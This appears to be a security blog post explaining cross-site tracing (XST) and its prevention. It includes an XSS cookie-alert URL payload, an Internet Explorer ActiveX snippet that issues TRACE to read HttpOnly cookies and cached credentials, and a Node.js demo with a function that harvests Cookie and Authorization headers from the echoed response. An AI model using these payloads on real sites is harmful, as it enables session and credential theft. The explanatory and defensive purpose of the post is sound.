Cross-site tracing (XST)
Web/Security 2019. 9. 7. 11:43
1. Overview
In web security, cross-site tracing (abbreviated "XST") is a vulnerability that abuses the HTTP TRACE method, a diagnostic method whose response echoes the request back to the client exactly as the server received it.
XST scripts rely on ActiveX, Flash, or any other client-side component that lets them issue an HTTP TRACE request. Because the TRACE response echoes the request, it contains every header the browser attached automatically, including Authorization data and the full Cookie header, and all of it becomes readable by the script as ordinary response text, even for cookies flagged HttpOnly. In combination with a cross-domain access flaw in the browser, the exploit can collect the cached credentials of any web site, including sites served over SSL/TLS, since TRACE is available over HTTPS just as over HTTP.
2. Example
The URL in the browser for a page showing the results of a search for "products" might be:
http://www.example.com/search.php?query=products
Now, take the following cases:
2.1 When HttpOnly cookies are not deployed, and TRACE is enabled
The attacker might post a modified link, such as this:
http://www.example.com/search.php?query=<script>alert(document.cookie)</script>
This harmless example will cause the victim's browser to pop up an alert box showing their current set of cookies. It is ordinary reflected XSS and needs no TRACE at all: because the cookies lack the HttpOnly flag, document.cookie exposes them directly, and a real attacker would send them to a server they control instead of calling alert().
2.2 When HttpOnly cookies are deployed but TRACE is still enabled
Here document.cookie returns nothing useful, so the attacker instead makes the victim's browser send a TRACE request and reads the echoed Cookie header out of the response. The IE-era snippet below (Microsoft.XMLHTTP ActiveX object) does exactly that. It has to run from a page the browser treats as the same origin as www.foobar.com, or rely on a cross-domain flaw as described in the overview, and current browsers refuse TRACE in XMLHttpRequest.open altogether:

    // IE-only: build the request object through ActiveX
    function sendTrace() {
        var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
        // Synchronous TRACE to the target; the browser attaches its cookies
        // (HttpOnly ones included) and any cached Basic/NTLM credentials
        xmlHttp.open("TRACE", "https://www.foobar.com/extranet/", false);
        xmlHttp.send();
        // A 200 response body is the request as the server received it,
        // Cookie and Authorization headers and all
        var xmlDoc = xmlHttp.responseText;
        alert(xmlDoc); // a real attack would exfiltrate this instead
    }

    <input type=button OnClick="sendTrace();" value="Send Trace Request">
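To make the mechanics concrete without an old browser, here is an added example in JavaScript (Node.js) that is not from the original post: it models a server that still has TRACE enabled, a hardened one that refuses the method, and the harvesting step an attacker's script performs on the echoed text. The host name, the cookie values and the Basic credentials are constructed for the demonstration.

```javascript
// Added example, not code from the original post. Everything here is
// constructed: the host, the cookie values, the credentials and the raw
// request bytes. It models (1) what a server with TRACE enabled echoes
// back, (2) what a script that can issue TRACE harvests from that echo,
// and (3) the hardened behaviour of a server that has TRACE disabled.

// Parse a raw HTTP/1.1 message head ("Start-Line\r\nHeader: v\r\n\r\n")
// into its start line and a header map (names lower-cased, last value wins).
function parseHead(raw) {
  const end = raw.indexOf("\r\n\r\n");
  const head = end === -1 ? raw : raw.slice(0, end);
  const [startLine, ...lines] = head.split("\r\n");
  const headers = {};
  for (const line of lines) {
    const i = line.indexOf(":");
    if (i === -1) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { startLine, headers };
}

// Server side. A TRACE request is answered with a 200 whose body is the
// request exactly as received (RFC 7231 section 4.3.8, Content-Type
// message/http). That echo is the whole problem: the browser attached the
// Cookie header automatically, HttpOnly or not, and it comes straight back
// as response text that the calling script can read.
function serveRequest(rawRequest, { traceEnabled }) {
  const { startLine } = parseHead(rawRequest);
  const method = startLine.split(" ")[0];
  if (method === "TRACE") {
    if (!traceEnabled) {
      // Hardened server: refuse the method outright (Apache: TraceEnable off).
      return "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n" +
        "Content-Length: 0\r\n\r\n";
    }
    return "HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n" +
      "Content-Length: " + Buffer.byteLength(rawRequest) + "\r\n\r\n" + rawRequest;
  }
  return "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n";
}

// Attacker side. Given the text the TRACE request came back with, pull out
// the headers a script would otherwise never get to see.
function harvestFromTrace(responseText) {
  const { startLine, headers } = parseHead(responseText);
  if (!startLine.startsWith("HTTP/1.1 200") ||
      (headers["content-type"] || "") !== "message/http") {
    return null; // not an echo: TRACE is disabled or blocked
  }
  const bodyStart = responseText.indexOf("\r\n\r\n") + 4;
  const echoed = parseHead(responseText.slice(bodyStart));
  return {
    cookie: echoed.headers["cookie"] || null,
    authorization: echoed.headers["authorization"] || null,
  };
}

// Constructed request as a browser would send it: the session cookie was set
// with HttpOnly, so document.cookie shows nothing, yet the Cookie header is
// still attached by the browser and therefore still echoed by the server.
const TRACE_REQUEST =
  "TRACE /extranet/ HTTP/1.1\r\n" +
  "Host: www.foobar.com\r\n" +
  "Cookie: PHPSESSID=deadbeef0123; theme=dark\r\n" +
  "Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n" + // alice:hunter2, constructed
  "\r\n";

// Run the round trip against a server with TRACE on or off.
function demo(traceEnabled) {
  return harvestFromTrace(serveRequest(TRACE_REQUEST, { traceEnabled }));
}

console.log("TRACE enabled :", demo(true));   // cookie and Basic credentials leak
console.log("TRACE disabled:", demo(false));  // null, nothing to harvest
```

Run it with node: the TRACE-enabled case hands back the full Cookie header and the Authorization header even though the session cookie is HttpOnly, while the hardened server leaves the harvester with nothing. In a browser the same harvesting logic would operate on xmlHttp.responseText, which is why disabling TRACE on the server, not HttpOnly, is the fix.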
3. Prevention
- The first and foremost security measure is to disable the TRACE method on your web servers unless you genuinely need it. On Apache httpd that is the single directive TraceEnable off. Verify the result with a request such as curl -X TRACE -H "Cookie: test=1" http://www.example.com/ : a hardened server answers 405 Method Not Allowed (or similar) instead of returning a 200 whose body echoes the Cookie header.
- Moreover, Web-server vendors should have TRACE disabled in the web-server’s default “out-of-the-box” configuration.
- Proxy servers should also be shipped with TRACE disabled in their default configurations.
- On the client side, current browsers already refuse TRACE from script: XMLHttpRequest and fetch treat it as a forbidden method and throw instead of sending the request. The remaining client-side exposure is legacy browsers and plugins such as ActiveX and Flash; if you depend on an old browser, check your vendor's support page for its handling of TRACE.
- For Internet Explorer users: if you must continue using Internet Explorer, switch to version 7 or 8, which appear to have patches for this attack. The far better path is to use a current version of Mozilla Firefox instead (the original advice named anything newer than 3.2; any supported release today rejects TRACE from script). None of this replaces disabling TRACE on the server, since you do not control which browser your users run.
4. References
http://infosec.vishalmishra.in/2013/02/cross-site-tracing.html
https://en.wikipedia.org/wiki/Cross-site_tracing
https://opensourceforu.com/2010/12/securing-apache-part-4-xst-xshm/